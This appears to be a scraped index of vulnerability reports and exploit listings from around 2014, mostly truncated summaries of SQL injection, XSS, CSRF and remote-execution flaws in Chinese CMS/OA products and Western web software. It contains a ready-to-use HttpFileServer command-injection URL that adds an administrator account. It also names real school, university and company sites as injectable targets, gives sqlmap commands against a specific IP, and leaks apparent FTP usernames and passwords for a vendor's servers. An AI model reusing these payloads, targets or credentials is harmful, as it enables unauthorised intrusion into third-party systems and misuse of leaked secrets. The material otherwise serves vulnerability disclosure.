XYCMS企业建站系统 2.5(注射&&后台配置插马)

简要描述： 前年她17岁，她看到我的IPad，说“姐夫，你的IPad不错嘛！” 她回去的时候，她姐姐把IPhone给她带上了。 去年她18岁，她看到我的IBM后，说“姐夫，你的IBM不错嘛！” 她回去的时候，她姐姐把IBM笔记本给她带上了。 今年她19岁，她看到我后，害羞的说：“姐夫，其实你这人挺不错的” 我在等她姐姐发话。 详细说明： 1 存在注入漏洞文件： newsdetail.asp 1-14行 无此新闻信息！" response.End end if % id没过滤进入查询 同样的问题：common.asp pro.asp news.asp prodetail.asp 漏洞证明：...

ActualAnalyzer Lite 2.81 /aa.php 命令执行漏洞

No description provided by source...

JCMS /jcms/jcms_files/jcms1/web1/site/module/comment/opr_readfile.jsp 任意文件下载漏洞

No description provided by source...

某OA系统存在SQL注入(sa权限)#2

简要描述： RT 详细说明： 海天OA存在一处sql注入 海天OA官网：http://www.haitiansoft.com:8080/ 前人也有提交过我就不写那么多案例了，下面就用5个案例来做安全测试！ SQL注入点： Include/ChaXunDetail.asp?FID=1 漏洞证明： 案例1： 1.http://www.cnshuiyu.com/Include/ChaXunDetail.asp?FID=1 案例2： 2.http://www.fzsyxx.com/oa/Include/ChaXunDetail.asp?FID=1 案例3...

wdlinux#所有版本某密码策略设计错误

简要描述： 0.0 详细说明： wdlinux 所以版本 某密码策略设计错误 主页：http://www.wdlinux.cn 程序安装之后，在控制面板中： 比如FTP用户： 这里密码据说是隐藏，可是呢？ F12看下 好了 就这样 漏洞证明： 如上...

Wordpress Like Dislike Counter 1.2.3 /wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php SQL注入漏洞

No description provided by source...

TCCMS v9.0 /system/core/controller.class.php SQL注入漏洞

No description provided by source...

海天OA系统存在SQL注入(sa权限)

简要描述： RT 详细说明： 海天OA存在一处sql注入 海天OA官网：http://www.haitiansoft.com:8080/ 前人也有提交过我就不写那么多案例了，下面就用5个案例来做安全测试！ SQL注入点： Documents/FolderInfor.asp?POAID=1 漏洞证明： 1.http://180...94/Documents/FolderInfor.asp?POAID=1 2.http://oa.tu.edu.cn/Documents/FolderInfor.asp?POAID=1...

KPPW开源威客系统绕过防护盲注

简要描述： KPPW开源威客系统 绕过防护盲注 详细说明： 1. WooYun: kppw一处sql注入 厂商对这个漏洞进行了修复。替换了union 不能进行联合了 但是可以进行盲注。 同一个类型，多点。不过问题都出在消息这。 2. 注册两个帐号，然后其中一个对另外那个发送3个消息。 3. 打开中间那条 url如下 http://192.168.1.101/KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16 然后尝试注入 下面我们可以看到 上一条 和 下一条 。 注入测试...

某学校综合管理平台OAsql注入漏洞(影响大量学校)

简要描述： 前台走一走 详细说明： 问题厂商：上海安脉计算机科技有限公司 谷歌百度：版权所有：上海安脉计算机科技有限公司 大量学校使用该系统 管理平台没发现漏洞，但是这套系统附带一套oa系统 /anmai/oa/adduser.aspx 在密码出现sql注入 只能手工不好利用 但是 这有个用户修改 只需添加参数id /anmai/oa/adduser.aspx?id=1 （id存在注入） 以该公司demo为例 http://www.anmai.net/anmai/oa/adduser.aspx?id=1 Place: GET Parameter: id Type: error-based...

cmseasy 再次绕过前台sql盲注(无需登录)

简要描述： cmseasy 再次绕过前台sql盲注无需登录 详细说明： 我们直接进入: archiveact.php:611-628: function respondaction includeonce ROOT . '/lib/plugins/pay/' . front::$get'code' . '.php'; $payclassname = front::$get'code'; $payobj = new $payclassname; $uri = $SERVER"REQUESTURI"; $uriget = strstr$uri, '?'; $uriget =...

ecshop csrf防御绕过后台敏感功能csrf getshell

简要描述： csrf防御绕过。 详细说明： 可以csrf执行后台各种敏感功能。这里分析的是利用空referer的方式绕过。参考http://zone.wooyun.org/content/744 利用这个绕过可以实现ecshop各个版本的csrf getshell，csrf dump数据库。测试了2.7.3一个版本和最新的2.7.4 本文可以看做该帖子的http://zone.wooyun.org/content/744的一个实例测试。感谢大神们分享技术. exp1,csrf getshell 利用执行sql的接口，结合报路径漏洞。 新建html文件内容为： '" 新建...

xdcms系统存储型XSS

简要描述： 储存xss 详细说明： 官方DEMO测试 http://demo.xdcms.cn/ 在个人中心资料处均可直接输入XSS代码保存即可 测试付款时候个人信息里的XSS一样会存在可打商家 漏洞证明： 在个人中心资料处均可直接输入XSS代码保存即可 测试付款时候个人信息里的XSS一样会存在可打商家 img src="https://images.seebug.org/upload/201409/18135853827502634019e466f2...

正方某系统通用型命令执行漏洞（多案例）

简要描述： 通用型。 详细说明： 涉及系统是正方软件股份有限公司的人力资源管理系统。 部分案例列举如下： http://rczp.tyut.edu.cn/xtgl/indexsessionOut.html http://202.202.160.39:8021/zftal-hrm/xtgl/loginloginpage.html http://ywxt.suoyuan.com.cn/zftal-hrm/xtgl/loginloginpage.html http://hr.tjtc.edu.cn/zftal-hrm/xtgl/loginloginpage.html...

TinyShop SQL注入（开启GPC，绕过过滤）

简要描述： 之前的都是找程序员的疏忽，这个位置是绕过程序的防注入。 详细说明： 环境： GPC = On public static function sql$str //过滤函数 if !getmagicquotesgpc //gpc off 就转义，把之前那个奇葩的漏洞补了 //不使用主要是因为，先有mysql的连接 //$str = mysqlrealescapestring$str; $str = addslashes$str; $str =...

cmseasy 的一个高危漏洞（设计缺陷）

简要描述： 这个可以做比较多的事。 详细说明： 因为他的session的机制是从 【数据库中取出 存入的】,所以有个注入点就可以操控他的session了。 在 frontclass.php 1509 - 1522行中 class session static function get$key if isset$SESSION$key return $SESSION$key; else return false; static function set$key,$var $SESSION$key=$var; static function del$key unset$SESSION$key...

phpwind 8.x全版本存储型xss漏洞（捡的）

简要描述： rt 详细说明： 在某个学校读书，然后某个学校的论坛是用phpwind 8.7的，在wooyun搜到一个储存型漏洞， 祸不单行的事情又发生了，因为phpwind已经是9.0版本了，去看了下9.0版本没发现有这个功能，所以自评rank2分。不知道能过审核不！ WooYun: phpwind 8.x全版本存储型XSS 这个漏洞 imghttp://pic1.sc.chinaz.com/files/pic/pic9/201404/apic493.jpg';alert/xss////img 在个人空间有个日志功能，在日志内容插入此代码也可以xss 8.x版本都存在吧。 漏洞证明： -...

Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution

No description provided by source...

Atmail Webmail 7.2 - Multiple Vulnerabilities

No description provided by source. Title: Atmail Webmail =7.2 - Multiple XSS & FPD Date: 01.27.2014 Vendor: atmail.com Version: =7.2 Latest ATM, tested also on 7.1.1 Authors: Smash & Brag / smashatdevilteam.pl PoC: poczta.pl / demo.atmail.com 1. Cross Site Scripting a GET - viewmessageTabNumber...

PhpOnlineChat 3.0 - XSS

No description provided by source. Exploit Title: phponlinechat xss Date: 5/9/2014 Exploit Author: N0 Feel Vendor Homepage: http://phponlinechat.com/phpchat Software Link: http://phponlinechat.com/chat-free-download.php Version: 3.0 Tested on: win7 php online chat suffer from xss in user panel -...

Wordpress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability

No description provided by source. Exploit Title : Wordpress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability Author : Hannaichi @dntkun Date : February 5th, 2014 Type : php, html, htm, asp, etc. Category : Web Applications Vulnerability : Unauthenticated...

万户OA 无限制多参数sql注入

简要描述： sql注入 详细说明： 注入1： -u "http://119.254.81.197:7001/defaultroot/GovSendFileAction.do?editId=2&action=listLoad" --dbms="Microsoft SQL Servcer" --dbs 注入2： -u "http://119.254.81.197:7001/defaultroot/GovSendFileAction.do?id=2&action=modify" 注入3： -u...

用友某处页面泄漏产品ftp大量数据库打包

简要描述： 嘿嘿 详细说明： 问题页面 http://nczx.yonyou.com/tanchu.htm 然后找到几个ftp，就测试下第一个ftp ftp://125.35.5.209/ 账户：ncfw 密码：ncfw0428 还有 ftp://125.35.5.232/ 账户：ism 密码：ism2014 还有几个没有测试 漏洞证明：...

espcms sql注入漏洞

简要描述： 刚刚看了 espcms的官网 发现2014-09-16 16:58:17更新了,下了份看下，发现这上面的几个漏洞完全没修复啊..上次提交了个漏洞只给了5rank..敢给多点么.这次和上次那个相似,怕你们只修复一处,这处也提交下。 详细说明： 在order.php inordersave中 365-367行附近 foreach $did as $key = $value $value = intval$value; $oprice$key = floatval$oprice$key; $bprice$key = floatval$bprice$key;...

WordPress Acento-Theme /wp-content/themes/acento/includes/view-pdf.php 任意文件下载漏洞

No description provided by source...

Discuz7.x csrf+系统命令调用（开关机，创建文件等等）

简要描述： Discuz! csrf+系统命令调用，一个超级简单比拖数据库还来得快的get类型csrf，一张图片搞定管理员，只要管理员敢看一下，那么他就会自动执行系统命令，创建文件，删除文件，ping 等等命令，如果有权限，也可以开关机。求精华，这个应该比那个csrf脱裤危害比较巨大吧！！！！！ 详细说明： 直接分析代码： admin\db.inc.php:lines:270-287: $tablesstr = ''; foreach$tables as $table $tablesstr .= '"'.$table.'" '; require './config.inc.php';...

U-Mail存储型XSS漏洞(可XSS邮箱用户、系统管理员、域管理员)

简要描述： U-Mail存储型XSS漏洞，可XSS任意邮箱用户以及系统管理员、域管理员 详细说明： U-Mail邮箱系统未对邮箱用户的个人资料进行编码处理导致存储型XSS，可导致收到邮件的普通邮箱用户受到XSS，同时邮箱系统管理员、邮箱域管理员在进行用户管理时也会受到XSS攻击，可导致邮箱系统管理员和域管理员的会话被劫持，邮箱系统被控制，更进一步利用U-Mail得PHP+IIS解析漏洞可导致服务器被控制。 U-Mail官网：http://www.comingchina.com/ 试用版下载：http://www.comingchina.com/html/downloads/...

HttpFileServer v2.3 /search 命令执行漏洞

访问http://localhost:80/?search==%00.exec|cmd. 直接执行命令漏洞利用过程访问地址http://127.0.0.1/?search==%00.exec|cmd /c net user testsuw@Dmin123! /add.http://127.0.0.1/?search==%00.exec|cmd /c net localgroupadministrators test123 /add...

ManageEngine Desktop Central StatusUpdate Arbitrary File Upload

No description provided by source. This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include...

USB&WiFi Flash Drive 1.3 iOS - Code Execution Vulnerability

No description provided by source. Document Title: =============== USB&WiFi Flash Drive 1.3 iOS - Code Execution Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1316 Release Date: ============= 2014-09-15 Vulnerability Laboratory ID VL-ID:...

ChatSecure IM 2.2.4 iOS - Persistent XSS Vulnerability

No description provided by source. Document Title: =============== ChatSecure IM v2.2.4 iOS - Persistent Web Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1317 Release Date: ============= 2014-09-10 Vulnerability Laboratory ID VL-ID:...

OroCRM - Stored XSS Vulnerability

No description provided by source. Affected software: OroCRM is an easy-to-use, open source CRM with built in marketing automation tools for your commerce business. It's the CRM built for both sales and marketing! Discovered by: Provensec Website: http://www.provensec.com Author: Provensec Labs...

ALCASAR <= 2.8.1 - Remote Root Code Execution Vulnerability

No description provided by source. !/usr/bin/env python -- coding: utf-8 -- ALCASAR = 2.8.1 Remote Root Code Execution Vulnerability Author: eF Date : 2014-09-12 URL : http://www.alcasar.net/ This is not a responsible disclosure coz' I have no sense of ethics and I don't give a fck. db 88...

CacheGuard-OS 5.7.7 - CSRF Vulnerability

No description provided by source. I. VULNERABILITY ------------------------- CSRF vulnerabilities in CacheGuard-OS v5.7.7 II. BACKGROUND ------------------------- CacheGuard is an All-in-One Web Security Gateway providing firewall, web antivirus, caching, compression, URL filtering, proxy, high...

BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit

No description provided by source. !/usr/bin/python ----------------------------------------------------------------------------- Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow SEH Exploit Date: Sep 05 2014 Vulnerability Discovery: Gabor Seljan Exploit Author: Robert Kugler Software...

osCommerce 2.3.4 - Multiple vulnerabilities

No description provided by source. Title: osCommerce 2.3.4 - Multiple vulnerabilities Date: 10.07.14 Affected versions: = 2.3.4 latest atm Vendor: oscommerce.com Tested on: Apache 2.2.22 at Debian Contact: smash at devilteam.pl Cross Site Scripting 1. Reflected XSS - Send Email Vulnerable...

phpMyFAQ 2.8.X - Multiple Vulnerabilities

No description provided by source. Title: phpMyFAQ 2.8.X - Multiple Vulnerabilities Vendor: phpmyfaq.de Date: 04.09.19 Version: = 2.8.12 Latest ATM Tested on: Apache 2.2 / PHP 5.4 / Linux Contact: smash at devilteam.pl 1 Persistent XSS Administrator is able to view information about specific user...

Joomla Spider Calendar <= 3.2.6 - SQL Injection

No description provided by source. !/usr/bin/env python -- coding:utf-8 -- from pocsuite.net import req from pocsuite.poc import Output, POCBase from pocsuite.utils import register class TestPOCPOCBase: vulID = '87242' version = '1' vulDate = '2014-08-31' author = 'anonymous' createDate =...

Wordpress Bulk Delete Users by Email Plugin 1.0 - CSRF

No description provided by source. Exploit Title: Bulk Delete Users by Email, Wordpress Plugin 1.0 - CSRF Google Dork: N/A Date: 05.09.2014 Exploit Author: Fikri Fadzil - [email protected] Vendor Homepage - http://www.speakdigital.co.uk/ Software Link:...

WordPress Acento Theme (view-pdf.php, file param) - Arbitrary File Download

No description provided by source...

IP Board 3.x - CSRF Token hjiacking

No description provided by source. Title: IP Board 3.x CSRF - Token hjiacking Date: 03.09.14 Version: = 3.4.6 Vendor: invisionpower.com Author: Piotr S. Video-PoC: https://www.youtube.com/watch?v=G5P21TA4DjY 1 Introduction Latest and propabbly previous IPB verions suffers on vulnerability, which...

vBulletin 5.1.X - Persistent Cross Site Scripting

No description provided by source. Title: vBulletin 5.1.X - Cross Site Scripting Date: 05.09.14 Version: = 5.1.2 Latest ATM Vendor: vbulletin.com Contact: smash at devilteam.pl 1 Agenda Latest vBulletin forum software suffers on persistent cross site scripting vulnerability, which most likely can...

Jenkins 1.578 - Multiple Vulnerabilities

No description provided by source. Affected Vendor: http://jenkins-ci.org/ Date: 03/09/2014 Discovered by: JoeV Type of vulnerability: CSRF and Command Execution Tested on: Windows 7 Version : 1.578 Description: Jenkins is susceptible to CSRF attack and command execution. Using groovy one can fir...

ALCASAR 2.8 Remote Root Code Execution Vulnerability

No description provided by source. !/usr/bin/env python -- coding: utf-8 -- ALCASAR = 2.8 Remote Root Code Execution Vulnerability Author: eF Date : 2014-02-10 db 88 ,ad8888ba, db ad88888ba db 88888888ba d88b 88 d8"' "8b d88b d8" "8b d88b 88 "8b d8'8b 88 d8' d8'8b Y8, d8'8b 88 ,8P d8' 8b 88 88 d8...

Briefcase 4.0 iOS - Code Execution &amp; File Include Vulnerability

No description provided by source. Document Title: =============== Briefcase 4.0 iOS - Code Execution & File Include Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1319 Release Date: ============= 2014-09-11 Vulnerability Laboratory ID...

LoadedCommerce7 - Systemic Query Factory Vulnerability

No description provided by source. Title: LoadedCommerce7 Systemic Query Factory Vulnerability Advisory: http://breaking.technology/advisories/CVE-2014-5140.txt Credits: Discovered by Breaking Technology Research Labs 2014-06-30 Reference: CVE-2014-5140 - Assigned 31 June 2014 Timeline: Vendor...

某投稿系统通用型SQL注射漏洞（影响众多企事业单位及学校）

简要描述： 没有证明到数据库就不给通过啊好吧重新提交下 详细说明： http://74.125.111.99/search?q=inurl:Web/CommonPage.aspx?Id= 这里搜索到很多。随便找几个测试下： POST /web/keysearch.aspx HTTP/1.1 Host: www.XXXX.com User-Agent: Baiduspider Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language:...

Wordpress WP Support Plus Responsive Ticket System 2.0 Plugin - Multiple Vulnerabilities

No description provided by source. Exploit Title: Wordpress WP Support Plus Responsive Ticket System 2.0 Plugin - Multiple Vulnerabilities Google Dork: N/A Date: 09.09.2014 Exploit Author: Fikri Fadzil - [email protected] Vendor Homepage - http://wpsuportplus.byethost7.com/ Softwar...

Wordpress Like Dislike Counter 1.2.3 Plugin - SQL Injection Vulnerability

一、插件介绍 是一个支持文章、页面和评论投票顶踩的插件，你可以将顶踩放在文章、页面评论的任意位置，还可以放在网站首页上。如果你有一定代码修改能里的话，可以将本插件集成到主题里。 二、漏洞概述 Like Dislike Counter 1.2.3及其他版本存在多个SQL注入漏洞，成功利用后可使攻击者执行未授权数据库操作。 三、漏洞描述 Like Dislike Counter 插件SQL注入漏洞存在于ajaxcounter.php文件中，主要原因是未对POST数据中的postid进行有效过滤，致使非法数据被数据库正常解析执行。 四、漏洞分析...

Joomla Spider Contacts 1.3.6 (index.php, contacts_id param) - SQL Injection

No description provided by source...